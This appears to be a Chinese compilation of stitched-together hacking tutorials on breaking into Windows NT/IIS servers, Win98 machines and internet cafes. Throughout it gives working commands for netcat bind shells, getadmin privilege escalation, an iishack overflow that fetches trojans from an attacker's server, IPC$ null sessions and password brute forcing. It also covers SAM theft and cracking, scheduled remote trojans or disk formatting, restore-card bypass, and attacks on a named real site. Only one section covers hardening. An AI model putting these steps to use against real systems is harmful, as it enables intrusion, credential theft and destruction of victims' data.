一、通过修改注册表
凡是具有登录NT本机的用户,例如IUSR_machine,都具有对 HKEY_LOCAL_MACHINE/SOFTWARE/MICROSOFT/WINDOWS/CurrentVersion/Run 项的可读可写权限,该用户可以远程访问这个项。比如,他可以创建一个bat文件,文件内容为: cmd.exe /c net localgroup administrators
IUSR_machine /add,把该文件copy到winnt目录下,然后在注册表上述的项添加一个数值,指向这个文件。
那么,当下次Admin登录到该机器上时,就会自动把IUSR_machine添加到Administrators组。
另,注册表键HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer/User Shell Folders/Common Startup 也可以这么做。
二、自建telnet服务在NT上执行指令
要求用户有文件上传权限,而且该目录位于web目录下,该目录允许执行
下面是具体步骤
假设你的目录是www.xxx.com/frankie
那么,把cmd.exe(位于C:/winnt/system32/cmd.exe)和Netcat里面包含的nc.exe传到这个目录上去,
然后,在浏览器端输入:
http://www.xxx.com/frankie/cmd.exe?/c%20nc.exe%20-l%20-p%2023%20-t%20-e%20cmd.exe
这时候,你的浏览器将停止不动,实际上,server上的Telnet的服务已经产生了:
这时,用Telnet连接www.xxx.com的23端口,你发现,不用密码,不用登陆,对方C:/提示符已经出现在你的眼前!更妙的是,这个Telnet server是一个一次性的服务,当客户端一退出,该服务也将终止.
Netcat不同于一般的特洛伊木马,它可以构建任何的TCP连接服务.在浏览器端输入上述的字符串,等价于在NT的Dos方式下输入: nc -l -p 23 -t
-e cmd.exe 这将把cmd.exe绑定到23端口上
三、入侵NTserver典型途径V2.0
简介
1、如果你有NT/IIS服务器的任何一个帐号,哪怕是guest帐号,都可以获得root
2、用netcat和iishack可以获得root
3、iusr_计算机名这个帐号有ftp上传,web执行等权限.
4、在web server上执行程序是入侵NT的关键
5、要在web server上执行程序就先要上传文件到cgi-bin目录或者scripts目录等有执行权限的目录上去
在本文中,目标机器的名称是ntsvr2,目标机器的域名是www.xxx.com,目标机器上有scripts和cgi-bin目录,scripts目录下有uploadn.asp等asp
程序,可能有guest帐号,肯定有iusr_ntsvr2这个帐号:
第一个方法,用iusr_ntsvr2后者guest这两个帐号,这里假设我们已经破解了这个帐号的密码:
在浏览器输入:
http://www.xxx.com/scripts/uploadn.asp
guest和iusr_ntsvr2这两个帐号都可以进这个asp页面
在这里把文件getadmin和gasys.dll以及cmd.exe上传到/scripts目录.
然后输入:http://www.xxx.com/scripts/getadmin.exe?IUSR_ntsvr2
大约十多秒后屏幕显示:
CGI Error
这时有90%的可能是:你已经把IUSR_ntsvr2升级为Administrator,也就是任何访问该web站的人都是管理员
下面可以add user:
http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:/winnt/system32/net.exe%20user%20china%20news%20/add
这样就创建了一个叫china用户,密码是news,然后:
http://www.xxx.com/scripts/getadmin.exe?china
第二个方法,用匿名ftp:
如果允许匿名帐号ftp登陆的设定,也给我们带来了突破NT server的机会。我们用ftp登陆一个NT server,比如:www.xxx.com(示例名):
ftp www.xxx.com
Connected to www.xxx.com
220 ntsvr2 Microsoft FTP Service (Version 3.0).
ntsvr2这个东西暴露了其NETbios名,那么在IIS的背景下,必然会有一个IUSR_ntsvr2的用户帐号,属于Domain user组,这个帐号我们以后要用来
获取Administrator的权限
User (www.xxx.com:(none)):anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 输入 guest@ 或者guest
对于缺乏网络安全知识的管理员来说,很多人没有将guest帐号禁止,或者没有设置密码。那么guest帐号就是一个可用的正确的用户帐号,虽然
只属于Domain guest组
在这种情况下我们就可以进NT server的ftp了。
进去以后,看看目录列表,试试 cd /scripts 或cgi-bin等关键目录,如果运气好,改变目录成功,这时你就有了80%的把握。
把winnt下的cmd.execopy到cgi-bin,把getadmin和gasys.dll传上去到cgi-bin
然后输入:http://www.xxx.com/cgi-bin/getadmin.exe?IUSR_ntsvr2
大约十多秒后屏幕显示:
CGI Error
这时有90%的可能是:你已经把IUSR_ntsvr2升级为Administrator,也就是任何访问该web站的人都是管理员
下面可以add user:
http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:/winnt/system32/net.exe%20user%20china%20news%20/add
这样就创建了一个叫china用户,密码是news,然后:
http://www.xxx.com/cgi-bin/getadmin.exe?china
或者
http://www.xxx.com/scripts/tools/getadmin.exe?china
你再用china的帐号登陆,就可以有最大的权限了,也可以用上面的cmd.exe的方法直接修改 如果没有cmd.exe,也可以自己传一个上去到
scripts/tools或者cgi-bin目录
第三个方法,用netcat和iishack
如果你熟悉使用Netcat这个工具,你就知道,netcat可以利用NT的弱点在其上绑定端口,下面用eEye的工具已经介绍过,如果你熟悉Netcat,成功的可能性会更大:
IIS的ISAPI的毛病(*.HTR) 我们再来看看eEye最近这两天发现的一个关于NT/IIS的问题和工具.在IIS的/Inetsrv目录下,有个DLL文件叫
ism.dll,这个模块在web运行的时候就被加载到较高的内存地址,并且导致了零字节问题到处出现
IIShack.asm ,利用这个毛病,eEye写了两个程序:
iishack.exe
ncx99.exe,为达目的你必须自己有一个web server,把ncx99.exe和
netbus木马传到这个web server的目录下,比如你的web server是:
www.mysvr.com? 而对方的IIS server是www.xxx.com
则: iishack www.xxx.com 80 www.mysvr.com/ncx99.exe?? (注意,不要加http://字符!)
上述命令输入后这时你应该可以看到
------(IIS 4.0 remote buffer overflow exploit)-----------------
(c) dark spyrit -- [email protected].
http://www.eEye.com
[usage: iishack
eg - iishack www.xxx.com 80 www.mysvr.com/thetrojan.exe
do not include 'http://' before hosts!
---------------------------------------------------------------
Data sent!
然后,再把Netbus等特洛伊木马传到对方机器上去:
iishack www.example.com 80 www.myserver.com/netbus.exe
ncx99.exe实际上是有名的Netcat的变种,它把对方server的cmd.exe绑定到Telnet服务
ncx.exe 这是较早的版本,是把端口绑到80的,由于80端口跑web服
务,端口已经被使用.所以可能不一定有效
然后,用Telnet到对方的99或80端口:
Telnet www.xxx.com 99
结果是这样:
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
C:/>[You have full access to the system, happy browsing :)]
C:/>[Add a scheduled task to restart inetinfo in X minutes]
C:/>[Add a scheduled task to delete ncx.exe in X-1 minutes]
C:/>[Clean up any trace or logs we might have left behind.]
这样,你就完全控制了其硬盘上的文件!注意,如果你type exit退出,对方server上的这个进程也会退出
参考资料: eeye.zip
补救方法:在IIS的www service属性中将主目录的应用程序设置的*.htr的映射删除
微软对这个问题的正式回应
其它:用Retina.exe得到NT域内的帐号清单,逐个尝试这些帐号,如果有的密码薄弱而被你猜出来,就可以用上面的方法来获取NT的admin
不明白的地方请看黑客世界最新更新的有关NT的系列文章
版权属于CCSDT&Frankie所有
解决方案:
控制一般用户对注册表Run项的可写权限
打最新的Services Pack
黑客入侵Windows NT的“武器库
黑客入侵Windows NT的“武器库”
大致说来,黑客入侵Windows NT的原理和入侵Win95/98差不多, 因为NT同样是使用NetBIOS Over TCP/IP ( NBT )的技术, 而且应用范围比Win95/98 更广泛。以下是几种黑客入侵Windows NT的方法, 让我们也窥探一下黑客的“武器库”吧。
方法一、 使用空密码连线
现在假设目标电脑的IP地址是202.64.161.X (X为任选数字), 先使用nbtstat 指令查看对方NT的网络数据:
nbtstat -A 202.64.161.X
如果看到<20 的字样, 那么此NT系统可能将自己电脑数据共享出来。其实在NT安装后, 会将电脑上的驱动器都共享出来, 没错, 是自动共享出来的! 不过只是隐藏了, 所以你未必会看得见。而很多人在安装好NT后未做任何设置便即使用, 这正好给黑客一个入侵的大好机会。随后黑客就会使用Net View 指令看看这个IP 地址:
net view //202.64.161.X
正常来说会出现系统发生 System error 5 has occurred 的字样。这就是NT比Win95/98 安全的地方! 如果是Win95/98 , 只要使用net view 指令就可以看到对方电脑所有共享出来的资源, 如果是NT就一定要登录进入NT服务器才可以用net view 指令。但黑客并没有对NT服务器的帐户, 又怎样登录呢? 其实NT有一个很大的漏洞, 它有一个ipc$( Inter-Process Communication: 进程间通讯 ) , 其同样是隐藏共享, 作为服务器与服务器间的沟通, 只要连接到对方的IPC, 便有机会入侵了。他会先用null password ( 空密码, 即是没有密码! ) 来试试, 手法如下:
net use //202.64.161.X/ipc$ “ ” /use:“ ”
以上的“ ” 是空密码的意思, 如果连接上会看见“指令执行成功”的字样。接着便再用
net view //202.64.161.X
然后便可以看到对方所有共享出来的资源了。
接着黑客会用net use 指令, 把对方共享出来的资源映射成自己的网络驱动器, 之后想怎样用就随心所欲了。如果对方没有把隐藏共享取消, 黑客可以用以下指令:
net use X: //ip地址/c$
那对方的C 盘便会变成自己的X 盘了, 不过这方法未必一定可行, 因为NT服务器安装了Services Pack 3 或以上版本, 用空密码连接IPC$ 的权限被限制, 不能够映射NT上的驱动器 , 这时便要使用下一个方法。
方法二、使用NAT工具
如果用空密码进入NT服务器没有收获, 黑客们也不会绝望。黑客可以尝试使用其他帐户的密码来进入。如何知道NT服务器的帐户? 那当然是猜啦! 其实NT的密码不是想像中困难, 而是比想像中更易, 而这些大多是人为的错误。
首先需要一个NAT的程序, NAT全名是( NetBIOS Auditing Tool ) , 可以自动连线到NT服务器, 并猜对方帐户的密码, 这是Internet上黑客入侵NT的必备“武器”。
Essential NetTools 是一个专门检查NT漏洞的NAT 套餐, 它的功能非常强劲, 先来看看它的几个主要功能。
1. NB扫描
NB扫描 可以一次性替你扫描 Internet 上电脑的IP, 如果你上网的速度够快, 不用一分钟便可以扫描 整个Class C 的IP , 之后它会列出那一段IP地址内所有电脑的NetBIOS数据, 作用和黑客用nbtstat指令一样, 不同的地方就是不用逐一测试, 节省不少时间。
2. NATShell
NATShell 是用暴力破解的方法尝试登录入NT服务器, 只要把目标的IP 地址输入NATShell 的视窗, 便可以开始了。可能你以为“强攻”会很难, 但根据经验, 有4成以上的NT都可以轻易攻入, 什么原因呢? 因为人懒之故。
3.LMHosts
用NB扫描到目标后, 可以选“Add all items to LMhosts ”项, 便会将对方的IP 及电脑名称自动加在电脑的lmhosts文档内, 以后你可以用“查找”→“电脑”, 找到对方的电脑, 非常方便。
好了! 决定了要检查的目标后, 在NATShell填上它的IP 地址, 等待一段时间, 便可以看看结果-- NATShell的报告。
NATShell 会不断用不同的用户名 (userlist.txt) 及密码 (passlist.txt) 来登录进入NT服务器( 当然你可以自己再编辑这两个文件) 。如果成功连接, 便会有红色的warning 字句出现, 并且列出该NT系统 的用户名 和密码 。
例如找到NT的Administrator(管理员)的密码是admin 。便会尝试在DOS下打:
net use x: //IP 地址/c$ /user:administrator admin
便成功地把此NT系统隐藏的C区映射成自己电脑的某个盘了!
如果在NATShell 的报告是所有的共享都有"c onNECTED with name: *SMBSERVER" 的字样, 即是说NT连密码都没有设定, 如果是密码, 还要打入:
net use x: //IP 地址/c$ /user:administrator
便可以把NT的C 驱动器映射成自己的某个磁盘了。如果被黑客知道了管理员的帐户, 基本上黑客以后出入如走平地, 整台NT都会被黑客*控。
NAT 批量扫描法:
因为Essential NetTools 每次只可以扫描一台NT的密码漏洞, 效率实在太低了。为了使入侵更有效率, 黑客可以使用NAT的批量扫描法。
在Essential NetTools 的目录下有一个nat.exe 的文件, 是可以直接在DOS 状态下执行, 方法是:
nat -o result.tst -u userlist.txt -p passlist.txt 202.64.161.1-202.64.161.254
那么nat 程序便会根据用户名称文文档( userlist.txt ) 和密码文档( passlist.txt ) 来登录进入202.64.161.1 到202.64.161.254 的主机范围, 并会将结果存在result.txt 上。
方法三、 检查NT的密码
用Essential NetTools 可以用不同的户名称及密码文档来登录进入NT服务器, 如果直接得到管理员的帐户, 就证明这台NT服务器的安全程度低得可怜!
如果只是得到一般的帐户的密码, 虽然权力不大, 但也不代表这部NT是安全。例如黑客可以用一般帐户的密码登录进入NT服务器, 然后用Copy 指令, 将NT的密码文档拷到自己的电脑中。
不过NT的密码文档(SAM , 文件位置在/Winnt/System32/c onfig ) 的系统启动时是只读的, 不可以复制, 不过还有另一个文件, 就是在/winnt/repair/ 的目录中的sam._ 文档。
Sam._ 是什么文档? 通常在安装NT时都会制作系统恢复盘 , 遇到NT有问题时, 便可以用系统恢复盘 进入NT, 而sam._ 便是sam 密码文档的“副本”。只要将sam._ 拷到电脑上, 便可以用其他程序来慢慢破解密码了。在DOS 状态下执行复制:
copy //202.64.161.X/admin$/repair/sam._ c:/
便会把sam._ 文档拷到自己的C 盘内。如果目标电脑忽略了sam._ 的重要性, 没有设定好文件的权限, 便为黑客提供了大好机会了。
如何解开SAM 密码文档:
NT的系统密码是用单向散列( Hash ) 来处理过, 完全看不出源密码, 理论上要还原成源密码机会不大, 这些编码会放在SAM ( Security AccouNTManager ) 数据库内, 可以用一个专门破解NT密码的程序--- L0phtCrack 来破解。
它是Internet 上非常有名的检查NT密码工具, 它会用各种可能的密码, 反复模拟NT的编码过程, 并将编出来的密码与SAM 数据库的密码比对, 如果相同, 就会得出密码了, 黑客可以借此入侵NT的系统! 先将sam._ 用extract 指令解开, 在DOS 状态下打:
extract sam._ sam.txt
执行L0phtCrack , 在"File" "Import" "SAM file" 输入sam.txt ,在"Tools" "Start Crack" 便会开始解密。
如果NT的密码是一些数字或人名, 用L0phtCrack 不用十分钟便可以解开!有人曾用一台Pentium II 的电脑, 只用一日时间便完全解开管理员和其他帐户的密码。
但以上这些指令和工具都有限制的,就是只可以显示NT服务器的隐藏共享、已登录进入系统的用户名称,数据不够详细,以下黑客用的NTInfo扫描就可以进一步检查NT服务器的漏洞(也适用于Windows 2000)。
1. 用户数据一览无遗的NTInfo扫描
为了进一步了解目标电脑的安全性, 黑客需要使用一个超小型的工具NTInfo扫描 , 它只有69 KB , 但比Essential NetTools 更强劲! 只要执行它, NT服务器的隐藏共享 、用户帐户名称、域名都会一览无遗, 可以让黑客深入了解该台NT服务器的漏洞! 只要在DOS 状态下下执行:
ntis -n IP地址
之后NTInfo扫描便会列出一个详细的报告( HTML 文档) , 包括所有共享的资源( 包括了隐藏的) 、共享的名称、所有NT服务器内的帐户数据, 例如用户帐户名称、是否可以游客身份登录、多久没有更改密码等。而最强悍的地方是NTInfo扫描 ,它会自动检查NT服务器内帐户密码是否足够安全, 例如检查用户名称和密码是否一致、或者有没有使用密码等。
2. NTResource Kit 帮助入侵
如果大家的NT服务器安装了NTResource Kit 4.0 , 你会发觉这个工具非常有用。NTResource Kit 可以算是NT服务器的辅助工具, 可以帮助网络管理人员管理NT和遥控处理NT的工作。不过内里有几个程序常会被黑客利用来入侵NT的电脑。
(1) . 共享资源的Net Watch
如果有黑客使用上述介绍的方法来进入NT服务器, 便有机会为所欲为了!
只要使用Resource Kit 的"Net Watch" 便可以连接对方的电脑。在"c onnection" / "Add Computer" 输入电脑的IP 地址, 隔一会便会出现对方电脑共享出来的资源。"Manage Shares" 会显示对方的共用目录, 只要按" 添加共享资源" 便可将对方电脑整个硬盘都共享出来, 并且将权限设为"Everyone", 这便使得日后的攻击更方便了。
(2) . 监视程序的Process Viewer
NTResource Kit 提供了Process Viewer , 它可以检视Local 和Remote 电脑直接在执行的程序。Process Viewer 可以监视NT服务器的执行情况, 如内存和各种程序的使用情况。只要在"Computer" 输入对方电脑的IP 地址, 隔一会便会显示对方NT正在执行的程序, 它可以杀死本地电脑的程序。
黑客如果要杀死远程电脑的程序也是有办法的, 只要使用一个名叫Pskiller 的小程序就可以轻易做到了! 先用Process Viewer 连接NT电脑, 知道这台电脑正在运行什么程序, 之后便可以用Pskiller 来杀死。用法很简单, 在DOS 状态下输入:
pskill // 电脑名称或IP地址-u roland -p xyz
-u roland : 是用户名称/
-p XYZ:进程中的电脑或ID
(3). 定时控制的netsve
netsvc 是一个小小的程序, 可以用来启动NT的服务, 如schedule(进度表)等, 通常是黑客用来遥控执行NT服务器的某个程序, 先将netsvc 拷到对方的NT内:
copy ntsvc.exe //IP 地址/admin$/system32
然后再输入:
netsvc //IP 地址schedule /start
这便可以启动该电脑的schedule 服务。
然后便把一个木马或病毒程序( 假设是killer.exe ) 拷到对方电脑:
copy filler.exe //IP 地址/admin$/system32
之后便可以用at 指令来设定schedule 的执行时间:
at //IP 地址12:30 killer.exe
这样就可以在12:30 时自动执行killer.exe
如果遇到一些“辣手”的黑客, 只要复合一个含有format 指令的简单批处理文件到NT服务器上, 校准时间, 便可以将对方的NT清洗得一干二净。
(4). 关闭NT的shutdown :
shutdown : 关了对方的NT服务器:
Shutdown //IP 地址t:20
20秒后将NT自动关闭, 如果对方是大型网站可就惨了!
快捷方式引起Windows 98死机故障
那天我像平常一样收邮件,一封有趣的邮件引起我的注意,发信者向我推荐网站,并注明为了安全,请检查后再打开,附件为“Newdown.url”(如图1),大小0KB,看来应该是一个网站的链接。可能是它的安全提示让我“感动”,我没有直接点击打开这个网址快捷方式,而是选择将其保存到桌面上,以便查看其属性。然而,当我保存后点击任务栏中的[显示桌面]按钮时,系统出现了蓝屏,按两次空格后回到桌面,可以看到那个网址快捷方式已经保存在桌面上了,但系统仍然处于无响应状态,再按热启动键也不起作用,只好用系统复位键强制重新启动系统。更奇怪的事情发生了,当系统启动刚显示出桌面图标时,系统立刻又出现了蓝屏当机,以后多次重新启动均是如此。
分析结果:都是快捷方式惹的祸
在收到邮件后没有做任何其他操作,只是保存了这个快捷方式在桌面上,点击了一下[显示桌面]按钮,没有可能导致系统死机的操作呀,看来问题就出在这个快捷方式上了。
惹祸的邮件揭开谜底:快捷方式克死Windows 98
快捷方式导致Windows 98蓝屏,并不是这个快捷方式隐藏了什么病毒,而是它触发了一个严重的系统漏洞。我们知道Windows的快捷方式有三种,扩展名分别为LNK、PIF、URL。LNK是最常见的Windows应用程序快捷方式,PIF是DOS下的应用程序快捷方式,URL则是网址链接快捷方式,其中URL文件为纯文本格式,LNK和PIF文件则为二进制文件。这三种快捷方式都可以自定义图标文件,然而由于Windows存在设备名称解析漏洞,当把快捷方式图标文件名设定为Windows的默认设备名时,就可导致Windows 95/98系统崩溃。由于对图标的搜索是由Explorer自动完成的,所以只要快捷方式在资源浏览器中出现,就会导致系统崩溃。更为严重的是,如果快捷方式出现在桌面上,那么系统一启动就会崩溃。下面我们来做个实例来验证一下。
显示文件的扩展名
首先要在资源管理器中单击[查看]→[文件夹选项]→[查看]选项卡,去掉“隐藏已知文件类型的扩展名”前的复选标记(如图2)。然后新建一个文本文件Newdown.txt(注意不要建立在桌面上),双击打开这个文件,输入下面的内容(如图3已经省略),其中最后一段代码就是将图标文件设置指向Windows的默认设备名。
保存后退出,按[F2]键对Newdown.txt文件改名,输入新的文件名Newdown.url,当你输完字母回车改名的一瞬间,系统就会出现蓝屏当机。重新启动计算机后,只要你在资源管理器中打开Newdown.url文件所在目录,系统必然蓝屏,而不打开这个目录则没有任何问题,当然,如果你刚才建立文件在桌面上的话,就会出现无法启动的严重问题。另外,把文件名改为Newdown.lnk以及Newdown.pif同样能导致蓝屏,但这两种快捷方式名称没有URL网址快捷方式更具欺骗性。
这个漏洞在Windows NT/2000/XP操作系统中并不存在。
解决方法:不要随意接收文件,包括快捷方式!
找到了根源,问题就好解决了,只要把导致漏洞的这个快捷方式删除即可。如果你没有把它保存在桌面上,则可以在重新启动系统后,点击开始菜单选择进入MS-DOS命令行,进入保存该快捷方式文件的目录后用Del命令删除该文件即可。当然如果你直接保存在了桌面上,就无法进入系统了,只能启动到实DOS模式删除该文件。另外,如果你安装了Windows NT/2000/XP操作系统的话,也可以切换进入其他系统后删除快捷方式文件。
当然,除了采用邮件传播之外,也还有其他的传播方式,如通过QQ发送文件等。总之一句话:不要接受陌生人发来的任何附件,即使它是网址快捷方式
让你的IIS无懈可击
如果你的电脑新安装了nt4/win2000以后,并不是说就可以直接用来作Internet服务器了。尽管微软的补丁打了一大堆,但还是有些漏洞。现在我们就简单的谈一下如何使用IIS建立一个高安全性能的服务器。
一、 以Windows NT的安全机制为基础
1)NT打SP6补丁、2K打SP2补丁。把磁盘的文件系统转换成NTFS(安装系统的分区可以在安装系统的时候转换,也可以安装完系统以后,用工具转换)。同时把使用权限里有关Everyone的写、修改的权限去掉,关键目录:如Winnt/Repair连读的权限也去掉。
2)共享权限的修改。在NT下到开始菜单--》程序--》管理工具--》系统策略编辑器,然后打开系统策略里文件菜单里的“打开注册表”修改其中的windows NT 网络把其中勾去掉。 2K下可以写个net share c$ /delete的bat文件,放到机器的启动任务里。
3)为系统管理员账号更名。同时把系统管理员的密码改成强加密:密码长度在10位以上,并且密码要包括数字、字母、!等各种字符。
4)废止TCP/IP上的NetBIOS。通过网络属性的绑定选项,废止NetBIOS与TCP/IP之间的绑定。
5)安装其他服务。应该尽量不在同台服务器上安装数据库的别的服务,如果装了的话,最主要一点是数据库密码不能跟系统的登陆密码一样。
二、 设置IIS的安全机制
1)解决IIS4以及之前的版本受到D.O.S攻击会停止服务。 运行Regedt32.exe 在:HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/w3svc/parameters 增加一个值: value Name: MaxClientRequestBuffer Data Type: REG_DWORD 设置为十进制 具体数值设置为你想设定的IIS允许接受的URL最大长度。CNNS的设置为256。
2)删除HTR脚本映射。
3)将IIS web server下的 /_vti_bin 目录设置成禁止远程访问。
4)在IIS管理控制台中,点 web站点,属性,选择主目录,配置(起始点),应用程序映射,将htw与webhits.dll的映射删除。
5)如果安装的系统是2K的话,安装Q256888_W2K_SP1_x86_en.EXE。
6)删除:c:/Program Files/Common Files/System/Msadc/msadcs.dll。
7)如果不需要使用Index Server,禁止或卸载该服务。 如果你使用了Index Server,请将包含敏感信息的目录的“Index this resource”的选项禁止。
8)解决unicode漏洞: 2K安装2kunicode.exe、NT安装ntunicode86.exe。
经过以上的设置之后,我还是不敢说它就完全安全了,你可不要回去睡大觉呀!不过你可以放松一下了!
微软的产品虽然好用,但是它的漏洞和同类比起来是漏洞最多的一个.作为一个网管要时刻的注意新漏洞的出现,及时的采取相应的措施,做到有备无患!
破解还原卡的2种方法
第一种(个人认为是最实用的一种):
所谓硬盘还原卡其实就是在ROM中写了一段监控INT 13中断的程序.INT 13是一组控制硬盘读写数据等功能的中断程序,还原卡屏蔽了一些功能调用(如:写功能).当用户向硬盘写数据时,还原卡将数据拦截,将其写如自身的ROM中.而还原卡的ROM容量极有限,用户写入的数据多了,ROM中新数据就要覆盖老的数据,造成数据丢失,即而蓝屏死机!~这就是装还原卡的电脑容易死机的原因!~原理明白了,对策也自然产生了!现在关键就是找到原始INT 13入口.然后开启被屏蔽的功能,便能储存文件了!~
下面就以一台使用远志还原卡,Windows98的电脑为列来教大家怎么做.开机过程按住F8键,进入纯DOS环境.出现提示符C:/.然后键入
debug
-a 100
-xor ax.ax
-int 13
这时,开始寻找INT 13入口.输入t回车.不断从复.直到显示的地址形和FOOO.XXXX.后面的指令为:movdl.80.记下这一地址.按q键退出.然后在(0.13H#4)=0.4cH填写入这个地址.
列如:我得到的地址是:FOOO:9A95.
再次运行Debug 键入:
-e 0:4c 95 9A 00 F0
-q
作用是将数据表 95 9A 00 F0 写入地址0:4c开始的字节中,填时要仔细,不然会死机!破解完成!~
再输入 WIN 并按回车键,进入Windows98,现在你在Windows98中储存的东西都会存到硬盘上了.不用担心别人回会发现或删除你的文件,因为他们还是在还原卡的监控之下,根本就伤不到你的文件!下次进入系统时,只需要重写0:4c,就能继续装东西了!~
第2种(个人认为是最简单的一种,但成功率比第一种要低)
在启动Windonw时,同时按下Ctrl+HOME,进入还原卡的控制界面!~还原卡有一个默认密码是:12345678.如果运气好网管没有改的话,你就呵呵!~~~~~~~~~~~~~~~```
流光使用方法的介绍
流光基础教程
— 网际杀手
和溯雪一样,许多人在用流光的时候不知道如何下手,论坛来讨论的也多是“如何添加用户”这样的初级问题 :),就抽了点时间写这个简单的教程,希望让新手快速入门。
本文给紫菜、天涯和所有需要的朋友们!
我个人认为流光的破解可分为3大部分:
一、POP3/FTP/…探测
二、IPC探测
三、SQL探测
因为开发时间的原因,上面的探测模式略有不同,所以分成了三个部分,本教程说的是第一个部分的探测。后两个探测模式应该属于流光的高级应用了:)
下面我就简单说一下基本的破解流程:
1、你得有流光,我这里试验用的是流光2001.FOR Win98 中文版。FOR Win2000的也可以。
首次启动流光,看到如下图的界面:
首次使用是要注册的,不过不要想到花钱:),小榕只是想看看有多少人用他的流光而已。你可以填好相应的选项,然后点发送即可,如果发送失败,你把发送服务器换个就好了。
因为重装系统,我也不知道我发了多少次了 :( 。如果不想注册,就稍等下面的进度条走完,点稍后即可。如上图:
2、找个站点,我选的是中华网www.china.com的主页空间(home4u.china.com),探测方式:FTP。
有人常问扫描端口有什么用,其实作用就是你知道他提供了什么服务,然后可以采取相应的探测方式来获得PASS了:)我们知道主页几乎都用的FTP上传,我们这次就用来测试一堆用户名,看看有没有弱智的密码,呵呵,如果有 hacker.at.china.com 这样的,也不妨霸占为己有:)
3、加入要破解的站点名称:右键单击FTP主机→编辑→添加→输入 home4u.china.com →确定!
4、加入用户名:我们要破解的是一堆用户名,所以要加入用户名的列表文件!我们就加入流光目录下的 Name.dic :)右键单击刚才添加的主机:home4u.china.com → 编辑 → 从列表中添加 → Name.dic → 打开
然后会有“用户已存在列表中”的提示,我们选中“不再提示” → 确定 。如下图:
用户名太多,我们可以用点主机前面的“—”号把用户列表缩起来,如下图:
大家注意名字前面的小框中必须有√要是没有就无法探测了。
5、有了用户名,我们就可以进行探测了,大家会想到怎么不用密码?其实流光有个简单模式的探测,也就是用内置的密码”:“123456”和“用户名”来进行探测,因为这样的密码是使用频率最高的:)
当然你可以修改这个简单模式的文件,加入你认为弱智的密码。方法是:单击 工具菜单 → 模式文件设定 → 简单模式探测设置文件 → 加入你要加入的密码 → 把设置文件存盘!
下面我们就来看看这一堆名字里面有多少是用“123456”和“自己名字”来作为密码的。
探测 → 简单模式探测!
探测中…
6、探测完毕,也看到结果了,流光会问我们是否查看入侵检测报告,不想看可以选否。
报告的画面
7、如果要探测的是一个用户名,就需要添加字典、或者密码方案。方法是:右键单击解码字典或方案 → 编辑 → 添加 → 选择一个密码档即可。
以上就是流光的一次简单的探测了,事实上这些功能只能算是流光的2.5版的功能,流光2000增加的IPC/SQL等功能,使流光更加强大。如果你对这个已经很熟悉了,相信你看流光的HELP就会很快的学会IPC/SQL探测的。
关于用户名的问题:有人觉得自己加入的用户名不一定存在,如果不存在岂不是白费了力气?这点你大可以放心,流光会进行验证的。而且现在注册的用户入数之多,想个没有的名字都难,不信你随便敲个试试。
关于字典的问题:流光可以使用字典方案来探测,当然你也可以生成字典,有的新手在作练习的时候不知道怎么做,你也可以用记事本生成,每行输入一个密码,存盘后将扩展名改称.DIC,流光就认出来了:)如果你连扩展名都不会改 :( 那……
利用NetBIOS浏览他人电脑中的资料
NetBIOS (Network basic input output system)即网络基本输入输出系统。它在Windows系统中用于文件和打印机共享。
1. NetBIOS
To use NetBIOS remotely the computer has to have it running and unprotected first. To find if a computer has netBIOS boost up your favourite portscanner and look for netBIOS:
要远程使用NetBIOS,目标计算机必须运行该服务并未对之实施保护。可以打开端口扫描器进行扫描:
25/tcp open smtp
110/tcp open pop-3
135/tcp open loc-srv
139/tcp open netBIOS-ssn
如果结果如上,恭喜...
2. nbtstat
我们可以使用nbtstat获得攻击所需信息。打开WinXP的控制台或早期Windows版本的命令行。
输入命令:
--------------------------------------------------------------------------------
c:/>nbtstat -A 127.0.0.1
--------------------------------------------------------------------------------
如果使用IP地址就使用-A,使用主机名则使用-a.
运行后将获得如下信息:
code:--------------------------------------------------------------------------------
Local Area Connection 3:
Node IpAddress: [xxx.xxx.xxx.xxx] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
computername <00> UNIQUE Registered
workgroupname <00> GROUP Registered
computername <20> UNIQUE Registered
workgroupname <1E> GROUP Registered
workgroupname <1D> UNIQUE Registered
..__MSBROWSE__. <01> GROUP Registered
MAC Address = xx-xx-xx-xx-xx-xx
--------------------------------------------------------------------------------
下面这一行
--------------------------------------------------------------------------------
computername <20> UNIQUE Registered --------------------------------------------------------------------------------
很有用,因为<20>表示文件共享已经启用了。 那就意味着我们可以尝试连接到该电脑。
首先,我们需要知道硬盘名称等信息,并且我们还需要知道它是否安装的是XP以及有没有开放文件共享。可以使用命令:
net view //ipaddress来完成。
输入:
--------------------------------------------------------------------------------
C:/>net view //127.0.0.1
Shared resources at //xxx.xxx.xxx.xxx
Share name Type Used as Comment
-----------------------------------
SharedDocs Disk
The command completed successfully.
--------------------------------------------------------------------------------
应该获得如上显示信息 (在非XP系统中会有所不同).
该做点有趣的事情了: 如果想要像使用本地计算机一样使用和浏览该电脑,我们可以使用net use。格式如下:
net use letter: //ipaddress/name
输入:
--------------------------------------------------------------------------------
c:/>net use g: //127.0.0.1/SharedDocs
The command completed successfully.
c:/>net use h: //127.0.0.1/C
The command completed successfully.
--------------------------------------------------------------------------------
现在目标计算机的硬盘已映射为我们刚刚指定的盘符。(确保这一盘符不与本地电脑已使用盘符冲突)完成后就可以如同浏览本地电脑一样进行浏览 :
输入:
--------------------------------------------------------------------------------
c:/>cd g:
g:/>
--------------------------------------------------------------------------------
在windows XP中,可以直接打开“我的电脑”,在图形界面下浏览刚刚添加的映射盘.
完成后,记得要从机器中删除映射盘。
输入:
--------------------------------------------------------------------------------
c:/>net use /delete g:
g: was deleted successfully.
--------------------------------------------------------------------------------
有些系统需要密码才可以进入 (win2k, WinNT): (可以通过扫描器扫描)
获得密码后可使用如下命令进入:
--------------------------------------------------------------------------------
net use password //ip/sharename
如何搞跨一个网吧
先查它的ip IP:61.141.xxx.xxx (方法很多的)
我就打开DOS输入:net use //61.141.xxx.xxx/ipc$
提示输入密码:
我估计是空!
直接按下[Enter]
真的被我猜中了!
接着我便继续输入:net use //61.141.xxx.xxx/c$
提示输入密码:
我也没有理会!
谁知道这下不管用了!
找他的弱口令X-SCANNER(冰河的力作。下载地http://www.xfocus.org)扫他
我接着就映射他的c盘
net use z: //61.141.xxx.xxx/c$
